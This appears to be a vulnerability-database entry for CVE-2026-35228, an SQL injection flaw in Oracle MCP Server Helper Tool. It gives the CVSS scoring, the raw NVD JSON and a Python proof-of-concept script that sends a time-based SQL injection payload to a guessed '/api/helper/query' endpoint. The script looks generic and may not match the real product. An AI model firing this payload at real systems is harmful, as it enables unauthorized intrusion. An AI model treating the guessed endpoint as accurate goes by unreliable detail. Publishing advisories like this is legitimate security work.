Security Vulnerability Report
中文
CVE-2026-35228 CVSS 8.7 HIGH

CVE-2026-35228

Published: 2026-05-05 04:16:17
Last Modified: 2026-05-05 19:47:31
Source: [email protected]

Description

Vulnerability in the Oracle MCP Server Helper Tool product of Oracle Open Source Projects (component: helper tool). The supported versions that is affected is 1.0.1-1.0.156. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle MCP Server Helper Tool. Successful attacks of this vulnerability can result in Oracle MCP Server Helper Tool executing malicious SQL.

CVSS Details

CVSS Score
8.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Oracle MCP Server Helper Tool 1.0.1
Oracle MCP Server Helper Tool 1.0.156

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2026-35228 # SQL Injection in Oracle MCP Server Helper Tool import requests def exploit_sql_injection(target_url): """ Attempt to exploit SQL injection vulnerability. """ # Example endpoint based on common MCP structures, adjust as needed endpoint = f"{target_url}/api/helper/query" # Malicious payload to test SQL injection # This payload attempts to cause a time-based delay or logical true condition payload = "1' UNION SELECT SLEEP(5)-- " headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Content-Type": "application/json" } try: # Sending GET request with vulnerable parameter params = { "id": payload, "action": "execute" } print(f"[+] Sending payload to {endpoint}") response = requests.get(endpoint, params=params, headers=headers, timeout=10) if response.elapsed.total_seconds() >= 5: print("[!] Potential SQL Injection detected (Time-based delay observed).") elif "syntax error" in response.text.lower() or "sql" in response.text.lower(): print("[!] Potential SQL Injection detected (Error message observed).") else: print("[*] Request sent, analyze response manually.") print("[*] Response Status:", response.status_code) except requests.exceptions.RequestException as e: print(f"[-] Error connecting to target: {e}") if __name__ == "__main__": target = "http://127.0.0.1:8080" # Replace with actual target exploit_sql_injection(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35228", "sourceIdentifier": "[email protected]", "published": "2026-05-05T04:16:16.530", "lastModified": "2026-05-05T19:47:31.297", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle MCP Server Helper Tool product of Oracle Open Source Projects (component: helper tool). The supported versions that is affected is 1.0.1-1.0.156. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle MCP Server Helper Tool. Successful attacks of this vulnerability can result in Oracle MCP Server Helper Tool executing malicious SQL."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://www.oracle.com/security-alerts/all-oracle-cves-outside-other-oracle-public-documents.html", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.